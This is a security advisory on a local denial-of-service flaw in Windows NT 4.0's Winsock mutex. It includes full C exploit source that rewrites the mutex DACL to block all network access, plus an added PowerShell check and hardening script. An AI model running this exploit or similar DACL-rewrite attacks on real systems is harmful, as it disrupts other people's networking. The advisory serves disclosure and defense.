
Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below

Windows NT 4.0 creates a named kernel object, the mutex Winsock2ProtocolCatalogMutex, with a DACL that grants the Everyone group Full Control. Full Control includes the WRITE_DAC right, so any local user, including an ordinary User account, can replace the DACL with one that grants No Access. Once that is done, Winsock can no longer open the mutex, and all network connectivity through Winsock is disabled until the system is rebooted. This is a local denial of service; it requires no special privileges and grants the attacker none.

Vendor Response:

Microsoft has released a patch and you can read more about it in their Security Bulletin.

Sample exploit code:

/*
 * mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
 *                        http://ntsecurity.nu
 *
 * - Disables all network connectivity through Winsock
 * - Can be run from any account (e.g. an ordinary User account)
 *
 * Replaces the DACL of the Winsock2ProtocolCatalogMutex kernel object
 * with one that denies Everyone all access. Link with advapi32.lib.
 */

#include <windows.h>
#include <aclapi.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	PSID pEveryoneSID = NULL;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;
	DWORD err;

	/* SID of the Everyone group (S-1-1-0). */
	if (!AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0,
		0, 0, 0, 0, &pEveryoneSID)) {
		printf("AllocateAndInitializeSid failed: %lu\n", GetLastError());
		return 1;
	}

	/* Room for an ACL holding one ACCESS_DENIED_ACE for that SID. The ACE
	 * structure already contains the first DWORD of the SID, hence the
	 * subtraction. */
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
		GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	if (pDacl == NULL) {
		FreeSid(pEveryoneSID);
		return 1;
	}
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);

	/* A single deny-everything ACE for Everyone. */
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);

	/* The mutex's original DACL grants Everyone Full Control, which
	 * includes WRITE_DAC, so an unprivileged caller may replace the DACL.
	 * Afterwards no process can open the mutex until the next reboot. */
	err = SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
		SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL,
		pDacl, NULL);
	if (err != ERROR_SUCCESS)
		printf("SetNamedSecurityInfo failed: %lu\n", err);

	free(pDacl);
	FreeSid(pEveryoneSID);
	return (err == ERROR_SUCCESS) ? 0 : 1;
}
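The check and the corrective setting a practitioner would want, added here as an example that is not part of the original advisory and is not Microsoft's patch. It generalizes the condition that both the description above and mutation.c rely on: a named mutex whose DACL grants Everyone WRITE_DAC (part of Full Control) can have its DACL rewritten by any local user. The first function reports that condition; the second applies an illustrative least-privilege DACL (an assumption about what a sane DACL looks like, not the vendor's fix) that lets Everyone only wait on and release the mutex. It assumes Windows PowerShell 5.1 on the .NET Framework, where the Mutex.OpenExisting overload taking MutexRights and Mutex.GetAccessControl/SetAccessControl exist; the mutex name in the usage line is a placeholder. NT 4.0 had no PowerShell, so this is a check for current Windows, where named kernel objects live under Global\ or Local\.

```powershell
# Added example, not from the original advisory. Assumes Windows PowerShell 5.1
# (.NET Framework) for the Mutex.OpenExisting(name, MutexRights) overload.

function Test-MutexDaclWritableByEveryone {
    # Returns one object per ACE that lets Everyone (S-1-1-0) replace the
    # DACL, or nothing when the DACL is safe in that respect.
    param([Parameter(Mandatory)][string]$Name)

    # ReadPermissions (READ_CONTROL) is enough to inspect the DACL; we never
    # acquire the mutex.
    try {
        $mutex = [System.Threading.Mutex]::OpenExisting($Name,
            [System.Security.AccessControl.MutexRights]::ReadPermissions)
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        Write-Warning "No mutex named '$Name'"
        return
    }
    try {
        $acl   = $mutex.GetAccessControl()
        $rules = $acl.GetAccessRules($true, $true,
            [System.Security.Principal.SecurityIdentifier])

        # WRITE_DAC (ChangePermissions) allows rewriting the DACL directly;
        # WRITE_OWNER (TakeOwnership) allows it indirectly, because an owner
        # can always grant itself WRITE_DAC. FullControl contains both.
        $dangerous = [int][System.Security.AccessControl.MutexRights]::ChangePermissions -bor
                     [int][System.Security.AccessControl.MutexRights]::TakeOwnership

        foreach ($rule in $rules) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($rule.IdentityReference.Value -ne 'S-1-1-0') { continue }   # Everyone
            if (([int]$rule.MutexRights -band $dangerous) -ne 0) {
                [pscustomobject]@{
                    Mutex    = $Name
                    Identity = $rule.IdentityReference.Value
                    Rights   = $rule.MutexRights
                    Finding  = 'Everyone can rewrite this DACL'
                }
            }
        }
    } finally {
        $mutex.Dispose()
    }
}

function Set-MutexLeastPrivilegeDacl {
    # Illustrative hardened DACL (an assumption, not the vendor's fix):
    # Everyone may only wait on and release the mutex; Administrators and
    # SYSTEM keep the rights needed to manage it. Requires WRITE_DAC on the
    # object, i.e. run it as an administrator (the exploit needs no such thing).
    param([Parameter(Mandatory)][string]$Name)

    $R = [System.Security.AccessControl.MutexRights]
    $mutex = [System.Threading.Mutex]::OpenExisting($Name,
        $R::ReadPermissions -bor $R::ChangePermissions)
    try {
        $acl = $mutex.GetAccessControl()

        # Drop every existing ACE; GetAccessRules returns a copy, so removing
        # while iterating is safe.
        foreach ($old in $acl.GetAccessRules($true, $false,
                [System.Security.Principal.SecurityIdentifier])) {
            [void]$acl.RemoveAccessRule($old)
        }

        $W = [System.Security.Principal.WellKnownSidType]
        $everyone = New-Object System.Security.Principal.SecurityIdentifier($W::WorldSid, $null)
        $admins   = New-Object System.Security.Principal.SecurityIdentifier($W::BuiltinAdministratorsSid, $null)
        $system   = New-Object System.Security.Principal.SecurityIdentifier($W::LocalSystemSid, $null)

        # SYNCHRONIZE | MUTEX_MODIFY_STATE: wait and release, nothing else.
        $acl.AddAccessRule((New-Object System.Security.AccessControl.MutexAccessRule(
            $everyone, ($R::Synchronize -bor $R::Modify), 'Allow')))
        $acl.AddAccessRule((New-Object System.Security.AccessControl.MutexAccessRule(
            $admins, $R::FullControl, 'Allow')))
        $acl.AddAccessRule((New-Object System.Security.AccessControl.MutexAccessRule(
            $system, $R::FullControl, 'Allow')))

        $mutex.SetAccessControl($acl)
    } finally {
        $mutex.Dispose()
    }
}

# Usage; the object name is a placeholder, not a real system mutex:
# Test-MutexDaclWritableByEveryone -Name 'Global\ExampleMutex'
# Set-MutexLeastPrivilegeDacl      -Name 'Global\ExampleMutex'
```

Run the test function against any named mutex you can enumerate (for example with Sysinternals WinObj or handle.exe); an empty result means Everyone holds neither WRITE_DAC nor WRITE_OWNER on it. Apply the second function only to objects you own or in a lab: a service that expects to adjust its own mutex's DACL will break if Everyone's rights are cut down under it.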



© Arne Vidstrom. All rights reserved.